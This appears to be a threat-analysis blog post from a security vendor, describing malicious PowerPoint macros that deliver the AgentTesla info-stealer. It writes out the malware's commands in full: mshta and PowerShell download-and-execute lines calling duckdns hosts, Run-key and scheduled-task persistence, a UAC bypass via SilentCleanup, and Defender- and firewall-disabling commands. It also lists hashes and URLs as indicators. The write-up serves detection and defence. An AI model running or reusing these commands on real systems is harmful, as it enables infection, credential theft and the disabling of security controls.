AgentTesla Being Distributed via More Sophisticated Malicious PowerPoint Files

The ASEC analysis team has introduced malicious PowerPoint files that have been continuously distributed since last year. Recently, the team has discovered that various malicious features were added to the script that is run in the malicious PowerPoint file. The method the malicious file is run remains the same as the previous cases, and it performs features such as Anti-AV, and UAC Bypass, and execution of additional malware by a malicious script.

When the PowerPoint file is run, a security notice appears (see figure below) where the user selects whether or not to enable macros just like in the previous cases. Selecting Enable macro runs the malicious macro.

When the malicious macro is executed, an error notice appears disguised as a PowerPoint error, making it difficult for users to notice malicious behaviors.

The malicious macro is executed automatically by the Auto_Open() function, and the data used for the malicious behavior is obfuscated. Unobfuscating it shows the strings below, and the malicious command is executed via the shell function.

The malicious command executed by the malicious macro is as shown below, and just like in the previous cases, it approaches a malicious URL via mshta process to run additional scripts.

• Malicious Command

“c:\windows\system32\calc\..\mshta” “hxxps://hahahahh@j.mp/rendomchrsadowkaduaowidk”

• Final URL

hxxps://download2389.mediafire.com/f68ak6xluypg/t1qm2d4ahq43wn3/2.doc

Malicious vbscript exists within the website, and it performs three behaviors. It first saves a powershell command to Run Key and executes the command. The registry path and the powershell command are as shown below. The powershell command connects to two URLs to run additional scripts. The additional script is explained after vbscript.

• Registry Path

HKEY_CURRENT_USER\ SOFTWARE\Microsoft\Windows\CurrentVersion\Run:cwdfwiiuyqw

• Powershell Command

pOwersHelL.exe -NoProfile -ExecutionPolicy Bypass -Command i’E’x(iwr(‘hxxp://www.minpowpoin.duckdns.org/p1/2.txt’) -useB);i’E’x(iwr(‘hxxp://www.minpowpoin.duckdns.org/fin/c2.txt’) -useB);

Afterward, it executes the Registering to task scheduler command via Shellexecute, and the command is as shown below. The command registered to the task scheduler has the feature of connecting to a malicious URL via mshta, and the command repeats every 63 minutes. This URL is currently unavailable.

• Registering to Task Scheduler

schtasks /create /sc MINUTE /mo 63 /tn kwdwdwfdfabvco /F /tr MsHtA hxxp://kukadunikkk@bakuzamokxxxala.duckdns.org/b1/2.txt open

Lastly, it saves the malicious mshta command to Run Key. The registry path and the command are as shown below. Registered to Run Key, this command is automatically executed upon reboot, and the URL is currently unavailable.

• Registry Path

HKEY_CURRENT_USER\ SOFTWARE\Microsoft\Windows\CurrentVersion\Run:pilodkis

• mshta Command

MsHTa hxxp://www.starinxxxgkular.duckdns.org/s1/2.txt

The powershell command executed in vbscript as mentioned above attempts to connect to two URLs, and in each URL exists a malicious powershell command that performs different features. The powershell commands each perform features such as Anti-AV, UAC Bypass, and execution of malware. The powershell command executed in the first URL performs the feature of loading a malicious .NET executable. The loaded binary exists in the form as shown below, and it is decompressed vis gzip to be run.

Two binaries exist in the form below; one is a payload that performs malicious behaviors and the other performs the feature of injecting the payload into a normal process. The malicious binaries are loaded via the command below, and it is shown that they execute the Execute method of projFUD.alosh_rat of the first decoded .NET file. It also runs the “C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe” path and the second decoded .NET file through a parameter.

The executed Execute method is as shown below, and after creating aspnet_compiler.exe process, it injects the second .NET file to perform the malicious behavior. The file injected here has been discovered to be AgentTesla, an info-leaking malware.

The powershell command executed in the second URL performs various features such as anti-malware program scan and privilege escalation. When an anti-malware program exists in a particular path as shown below, it creates the “C:\Users\Public\commander.vbs” and copies it to the Windows start folder, then runs it. The commander.vbs file performs the feature of running the “C:\Users\Public\Comola.ps1” file via a powershell command.

The Comola.ps1 file is a normal script that is downloaded by connecting to http://www.google.com. It blocks the malicious behavior from executing when an anti-malware program exists.

The path of the scan target anti-malware program is as shown below.

– C:\Program Files\ESET\ESET Security\ecmds.exe

– C:\Program Files\Avast Software\Avast\AvastUI.exe

– C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe

– C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe

– C:\Program Files\AVG\Antivirus\AVGUI.exe

When an anti-malware program does not exist, the following malicious behaviors are performed. Many script files are created and the description of each file is as shown below.

1. C:\Users\Public\cooki.ps1

This file contains a powershell command that changes a specific registry value, and it disables the Windows security notice by changing the registry values.

• Changed Registry
  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks]
  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks{01979c6a-42fa-414c-b8aa-eee2c8202018}.check.100]
  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks{01979c6a-42fa-414c-b8aa-eee2c8202018}.check.101]
  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks{088E8DFB-2464-4C21-BAD2-F0AA6DB5D4BC}.check.0]
  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}.check.101]
  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks{134EA407-755D-4A93-B8A6-F290CD155023}.check.8001] and more

2. C:\Users\Public\Cola.ps1

This file performs the UAC Bypass feature. It scans the SID, and if it is an admin, it runs the “C:\Users\Public\common.vbs” file. If not an admin, it escalates the privilege using the SilentCleanup task, a Windows service. The SilentCleanup service is executed with the automatically-escalated privilege, and runs the %windir%\system32\cleanmgr.exe file. At this instance, it can manipulate the %windir% environment variable to execute the desired command with escalated privilege. The file changes the environment variable as shown below, then starts the SilentCleanup service.

• Change Environment Variable

powershell -ep bypass -w h $PSCommandPath;

3. C:\Users\Public\Tackel.ps1

This file performs the feature of disabling Windows Defender. It sets specific paths and processes as Windows Defender exception paths, and it contains the aspnet_compiler.exe process where AgentTesla is injected and processes that are used for the malicious behavior. It also changes the host file and installs .NET Framework 3.5 feature file.

• Windows Defender Exception Paths and Processes
  C:\
  D:\
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
  C:\Windows\System32\kernel32.dll
  explorer.exe
  aspnet_compiler.exe
  Mshta.exe
  powershell.exe and more
• Disable Windows Defender
  New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0
  Set-MpPreference -PUAProtection disable
  Set-MpPreference -HighThreatDefaultAction 6
  Set-MpPreference -ModerateThreatDefaultAction 6
  Set-MpPreference -LowThreatDefaultAction 6
  Set-MpPreference -SevereThreatDefaultAction 6
  Set-MpPreference -ScanScheduleDay 8
  netsh advfirewall set allprofiles state off
• Change Host File
  n66.254.114.41 virusscan.jotti.org

4. C:\Users\Public\common.vbs

This file runs Tackel.ps1 and cooki.ps1 files.

5. C:\Users\Public\Chrome.vbs

This file runs the Cola.ps1 file.

Ultimately, the Chrome.vbs file is run. Afterward, additional files are run consecutively to set the environment for the execution of malware such as anti-malware program scan, UAC Bypass, and disabling Windows Defender.

Malicious PowerPoint files have been changing continuously since last year, and they are being distributed with the addition of various malicious features. Users should refrain from opening files from unknown sources or running suspicious macro included in the file.

[File Detection]

• Downloader/PPT.Generic
• Trojan/VBS.Runner
• Trojan/PowerShell.Bypass
• Trojan/PowerShell.Disabler

[Behavior Detection]

• Execution/MDP.Mshta.M3546

[IOC Info]

• eceb63e68b9c3ea9d55e1a6cb1e25d5d
• 35b2343da6d21a5cede2751026be78f8
• a6fd5561622b8c942aa40a97a4baece8
• 61cc1dac681dfcbcd8781a498684d434
• 79106a7027e6bf3aff964ccf694d99fb
• 199afc572f448386b8a72f872b64778c
• 8e7581085b48c219c5fafdf0868a644b
• hxxps://download2389.mediafire.com/f68ak6xluypg/t1qm2d4ahq43wn3/2.doc
• hxxp://www.minpowpoin.duckdns.org/p1/2.txt 
• hxxp://www.minpowpoin.duckdns.org/fin/c2.txt
• hxxp://kukadunikkk@bakuzamokxxxala.duckdns.org/b1/2.txt
• hxxp://www.starinxxxgkular.duckdns.org/s1/2.txt

 [Previous Blog Posts about Malicious PowerPoint Files]

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.